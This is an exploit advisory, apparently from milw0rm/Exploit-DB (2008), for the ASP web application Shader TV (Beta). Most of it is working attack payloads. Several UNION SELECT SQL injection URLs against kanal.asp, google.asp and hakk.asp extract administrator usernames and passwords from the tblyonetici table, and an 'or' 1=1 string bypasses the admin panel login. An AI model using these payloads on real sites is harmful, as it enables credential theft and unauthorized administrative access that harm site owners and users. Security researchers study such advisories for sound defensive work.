Shader TV (Beta) - Multiple SQL Injections

EDB-ID:

5564

Author:

U238

Type:

webapps

Platform:

ASP

Published:

2008-05-08

Shader TV (Beta) Multiple Remote SQL Ä°njection Vulnerable


Script : http://www.aspindir.com/indir.asp?ID=5441

Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html

Coded  : Asp

Lnguae : Acces


Discovered By U238 | < Ugurcan Engin > 

Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz  :

Web - Designer Solution Developer

setuid.noexec0x1@hotmail.com

http://noexec.blogspot.com



0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !]

0x2 = [Ben Sadece Ä°yi Bir Ä°nsan Olmak Ä°stemistim ] 


Exploit:

Administrator Login to  creative web panel is atack of to SQL injectin.


http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici

----

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1

http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1

----

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici

http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici


Administrator Panel : 

target/ShaderTV/yonet



-------------------------------

Admin Panel Login Bypass :

target/ShaderTV/yonet/default.asp


username : 'or' 1=1

password : 'or' 1=1


This is Admin Panel See You ?


---------------------------------

# milw0rm.com [2008-05-08]